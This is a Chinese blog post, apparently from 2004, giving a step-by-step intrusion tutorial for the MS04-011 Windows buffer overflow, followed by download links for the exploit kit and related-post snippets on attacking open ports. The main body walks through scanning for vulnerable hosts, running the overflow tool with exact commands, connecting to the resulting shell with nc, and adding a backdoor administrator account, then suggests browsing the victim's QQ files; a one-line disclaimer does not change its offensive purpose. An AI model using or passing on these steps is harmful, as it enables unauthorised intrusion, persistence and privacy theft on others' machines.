Ms04011漏洞

原创 2004年07月06日 21:29:00

呵呵,大家都应知道这个漏洞吧,哈哈,它好厉害哦。HACKER们利用它来可以得到操作系统的administrators权限,得到系统的shell。不多说别的,看看他们都是入何入侵别人的机器吧。

 

1.  首先,去下载ms04011漏洞溢出的工具,网上有好多哦。

工具中包括了DSScan GetOS, MS04011溢出工具

DSScan:这个工具是用来扫描系统是否有MS04011漏洞的工具,当扫描到目标机器就此漏洞,便会列出它的ip地址,主机名, netbios名称,  还有最重要的就是状态信息. 它可以扫描到在此ip断内所有存活的主机,如果有MS04011漏洞的机器,在状态信息就列出vulnerable,否则为not vulnerable。一般一次扫描64ip地址。

GetOS:其是用来获得操作系统的类型,但必须对方机的139端口开放.

MS04011:其就是用来溢出的工具了.

2.如何溢出

首先用DSScan,在IP断内输入IP, 然后点那个右键头,使其进入右边的框内,可以多选

然后点击开始就可以.例如,我们扫到一个机器的结果为这样

Ip                      hostname           netbios              status

192.168.1.33       You                You                vulnerable

192.168.1.34       haha               haha                not vulnerable

大家可以看到192.168.1.33的机器statusvulnerable,这就说明它存在这ms04011的漏洞。

下面就让我们去溢出它吧,在开始溢出前先要得到对方机器的类型。用Getos来得到

在运行用输入cmd,回车,然后到你的程序路径下,输入getos 192.168.1.33

结果就会出现

[*] Connecting Port 139…..

[*] Sending session request…..

[*] Sending negotiation request….

[*] Sending setup account request….

[*] Successful…….

Remote OS:

-------------

WORKGROUP   这是工作组名

Windows 2000 LAN Manger  

Windows 5.0     这就是操作系统的类型,如果为windows 5.1那么就是xp

好了,我们知道它的类型是2000了,那么我们就马上用 ms04011来溢出吧

先打开两个cmd窗口, 在两个里面同时输入ms04011 0 192.168.1.33 然后一个一个的回车

在一个cmd里会出现

Shellcode size 404

Ret value = 1726  //注意1726才是溢出成功的代码

对于xp系统要用    Ms04011 1 192.168.1.33

3.如何得到机器的shell

要用到最厉害的瑞士军刀了(名称是NC), 哈哈,这个工具可不一般啊,到网上下载吧

然后在cmd内输入nc 192.168.1.33 1234 1234是溢出的端口号.哈哈是不是出现了这样的提示

C:/winnt/system32>

//哈哈,你成功了。你可以对其操作了

 

比如:

Net user haha 123 /add        //在对方机器可以建立名为haha, 密码为123 的用户

Net localgroup administrators haha /add  //使haha列入administrators.

<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

 

当然可以到应用程序的tencent目录里看看MMQQ号啊,以后常联系哦。

 

 

严重声明:不可以利用此方法做非法行为,如发现本人不负任何责任。发表此文的目的在于使大家重视自已系统的安全,常打补丁。在国内有好多的机器存在这样的漏洞,唉!!!!!

 

ms04011漏洞利用工具

  • 2010年06月10日 21:08
  • 182KB
  • 下载

MS04011利用工具包

  • 2011年07月10日 09:08
  • 182KB
  • 下载

Ms04011漏洞

呵呵,大家都应知道这个漏洞吧,哈哈,它好厉害哦。HACKER们利用它来可以得到操作系统的administrators权限,得到系统的shell。不多说别的,看看他们都是入何入侵别人的机器吧。 1.  ...
  • carbon107
  • carbon107
  • 2004-07-06 21:29:00
  • 4532

docker最新中文文档

docker手册中文版 立即下载 上传者: <em>ms04011</em> 时间: 2016-07-07 综合评分: 5 积分/C币:18 上传资源 q672443555 关注 积分82 查看全部1个资源 VIP...
  • 2018年03月24日 00:00

MS04011 利用 工具包 漏洞 扫描

  • 2009年12月18日 19:55
  • 172KB
  • 下载

各种端口的入侵方法

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后 SQLTool*.**e入侵 对sql的sp2及以下的系统,可用...
  • IBM386
  • IBM386
  • 2006-03-25 13:34:00
  • 1130

各个网络端口的入侵方法

1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的...
  • ago52030
  • ago52030
  • 2007-08-31 01:55:00
  • 723

缓冲区溢出漏洞 ms04011

DSScan使用 扫描目标主机是否存在ms04011漏洞 getos使用 获取操作系统类型 &amp;gt; getos.exe 192.168.1.101 --------------...
  • zhangxuechao_
  • zhangxuechao_
  • 2018-04-07 22:55:40
  • 26

ms04011工具

  • 2012年06月17日 17:03
  • 148KB
  • 下载

docker手册中文版

举报人: 被举报人: <em>ms04011</em> 举报的资源分: 18 *类型: *详细原因: 取  消 提  交 docker手册中文版 18 积分 立即下载 ...
  • 2018年04月08日 00:00
收藏助手
不良信息举报
您举报文章:Ms04011漏洞
举报原因:
原因补充:

(最多只允许输入30个字)